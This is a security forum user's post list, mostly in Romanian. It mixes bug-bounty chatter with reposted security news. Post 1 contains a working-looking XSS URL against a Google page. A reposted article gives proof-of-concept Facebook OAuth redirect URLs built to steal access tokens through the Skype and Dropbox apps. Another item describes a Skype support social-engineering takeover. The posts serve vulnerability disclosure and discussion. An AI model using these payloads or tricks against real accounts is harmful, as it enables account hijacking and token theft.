Jump to content

akkiliON

Active Members
  • Posts

    1177
  • Joined

  • Last visited

  • Days Won

    46

Everything posted by akkiliON

  1. Gata ! Am ceva special pentru voi ! Nu v? mai certa?i ) https://www.google.com/appserve/security-bugs/new?rl="><script>alert(42)</script> // Nu v? panica?i Se executa în sandbox !
  2. Poti sa faci un video ?i s? î?i cenzurezi vectorul, locul unde e vulnerabil ?i ceva din pagina ca s? nu se observe unde e Si la?i numai site-ul ! Adaugi document.cookie,domain si un alert cu un mesaj normal ) Ziceam ?i eu ) Dac? tot îs curio?i ! F?-le un video
  3. Nu ai trimis aici mesaj sitesecurity@paypal.com Dupaia î?i r?spund ca s? intri pe acest site keys.ebay.com s? le trimi?i mesaj înapoi dac? e ceva !
  4. P?i cum câcat nu ai mai primit nimic mesaj o_O ? În acel subdomeniu e valabil ! Eu am raportat unu în community ?i mi-au spus c? a g?sit altcineva bug-ul :/ !
  5. OFF: Era mai simplu s? îl întrebi ce înseamna GG si GJ
  6. Bug Bounty Program
  7. You can install the industry’s strongest and most expensive firewall. You can educate employees about basic security procedures and the importance of choosing strong passwords. You can even lock-down the server room, but how do you protect a company from the threat of social engineering attacks? For any of you that are involved in security awareness efforts, you know what I am talking about. It could happen tomorrow, it could happen today or it might already have happened. In a recent disclosure posted by renowned hacker and developer DarkCoderSc (Jean-Pierre LESUEUR) explained that how one can easily Socially Engineer Microsoft Skype Support team to get access to any skype account. From a social engineering perspective, employees are the weak link in the chain of security measures in place. He simply used the weakness of Skype password recovery system itself. One simply need to request a new password to Skype support and asking to change the password. After the initial step one needs to proof the real ownership of the account requested. You must give 5 contacts accounts to the support desk. "That’s easy because you just have to add 5 fake temporary accounts to the target account and its done. Another option is to simply ask the target what people he know on Skype. That option wasn't that hard because I have over 1000 contacts." he suggests the trick. Within few seconds attacker can become owner of any victim account by proving very basic information to support team. "Also Microsoft’s Support Team should make a serious effort to communicate better to their customers. At the moment they do not seem to care that much about their customers." Social engineering is the act of manipulating a person into gaining access or sensitive data by preying on basic human psychology. Still, There is no patch for human stupidity! Social Engineering Skype Support team to hack any account instantly - TheHackerNews
  8. Dac? tot a deschis cineva acest topic .... Î?i urez ?i eu La Mul?i Ani ?i mult? s?n?tate în continuare Apropo ! Age: ?
  9. Off topic ! Poate o sa primesti un "bonus" ! Puteai sa postezi daca tot ti se pare funny la categoria fun stuff !
  10. Microsoft has released an advance notification of 9 security bulletins that it plans to release on April 9, 2013. Microsoft said it will patch nine vulnerabilities in total and two of them rated critical and that of the remaining 7 as Important. The critical vulnerabilities are remote code execution issues. First vulnerability affects Microsoft Windows and Internet Explorer while the second vulnerability affects Microsoft Windows. The vulnerability will fix a flaw that allows a drive-by attack, which hackers can exploit to attack machines running the software using malware loaded websites. Earlier this year, Microsoft released an emergency update for Internet Explorer after all the commotion about the security holes in Java. The update aimed to patch a security vulnerability in Internet Explorer that is being used for attacks on government contractors and other organisations. The remaining 7 vulnerabilities pertain to issues affecting Microsoft Office, Microsoft Server Software and Microsoft Windows. Microsoft will host a webcast to address customer questions on the security bulletins on April 10, 2013, at 11:00 AM Pacific Time (US & Canada). TheHackerNews
  11. Vezi c? am postat eu asta ieri https://rstforums.com/forum/67599-url-redirection-flaw-facebook-apps-push-oauth-vulnerability-again-action.rst
  12. Prea tare acest challenge // Înc? mai e ceva // edit: Am terminat Nice challenge !
  13. The digital currency Bitcoin has suffered yet another hack. Bitcoin wallet site Instawallet has been taken offline after a security compromise, has suspended its service indefinitely. Instawallet didn't say in a notice on its website how many bitcoins were stolen after hackers fraudulently accessed company database. "The Instawallet service is suspended indefinitely until we are able to develop an alternative architecture. Our database was fraudulently accessed, due to the very nature of Instawallet it is impossible to reopen the service as-is." Bitcoin is a virtual currency that uses a peer-to-peer system to confirm transactions through public key cryptography. The company also announced it will accept claims for individual Instawallets for the first 90 days, using the wallets’ URL and key to file the claim. Clients will then be refunded the currency value if the balance is less than 50 BTC. The breach follows a series of attacks targeting bitcoin services. In September 2012, Bitfloor has suspended all operations after a hacker stole $250,000 worth of bitcoins. In May of last year, exchange site Bitcoinica was also breached, and attackers managed to grab bitcoins valued at $90,000. It may be a day or two before the effect of this theft on the currency can be determined. Bitcoin-Central is expecting to have their services back up and running within 48 hours and have promised to give 24 hours notice before going live. Instawallet however has been permanently compromised and is closing. TheHackerNews
  14. In earlier posts, our Facebook hacker 'Nir Goldshlager' exposed two serious Facebook oAuth Flaws. One, Hacking a Facebook account even without the user installing an application on their account and second, various ways to bypassing the regex protection in Facebook OAuth. This time, Nir illustrated a scenario attack "what happens when a application is installed on the victim’s account and how an attacker can manipulate it so easily" According to hacker, if the victim has an installed application like Skype or Dropbox, still hacker is able to take control over their accounts. For this, an attacker required only a url redirection or cross site scripting vulnerability on the Facebook owner app domain i.e in this scenario we are talking about skype facebook app. In many bug bounty programs URL redirection is not considered as an valid vulnerability for reward i.e Google Bug bounty Program. Nir also demonstrated that an attacker is even able to gain knowledge of which application their victims are using. Example url : https://www.facebook.com/ajax/browser/dialog/friends_using_app/?app_id=260273468396&__asyncDialog=2&__a=1&__req=m Because Facebook applications are developed by 3rd Party developers, who actually own the app, so facebook was helpless when to fix such potentially pernicious site redirection attacks. Continuing hacking method used in last two oAuth flaws (mentioned here), this time attack is trying to use app redirection flaw in “redirect_uri, next” parameter to steal the access_token of facebook users. POC (Using Skype app) : https://www.facebook.com/dialog/permissions.request?app_id=260273468396&display=page&next=http://metrics.skype.com/b/ss/skypeglobalmobile/5.4/REDIR/?url=http://files.nirgoldshlager.com&response_type=token&fbconnect=1 POC (Using Dropbox app) : https://www.facebook.com/dialog/permissions.request?app_id=210019893730&display=page&next=https://www.dropbox.com/u/68182951/redirect3.html&response_type=token&perms=email&fbconnect=1 The purpose of the hacker is just to steal the victim’s access_token through the use of Facebook OAuth flaws, so that he can take full control over victim's account remotely without knowing their passwords. Note: Flaw was reported to Facebook security team by Nir Goldshlager and but can't be fixed by Facebook team itself. Because app developers are responsible for aap programming mistakes, so issue is still unfix for other million apps. TheHackerNews
  15. Am g?sit si eu un XSS in Y!M ! L-am raportat ?i mi-or spus c? vor s? îmi dea un tricou Am s? îl postez mai unpic ! ?iiiiiii ... poate o s? mai fac unu public cât de curând dar nu e în Y!M !
  16. El a spus doar ca s? nu se mai mi?te acel scris
×
×
  • Create New...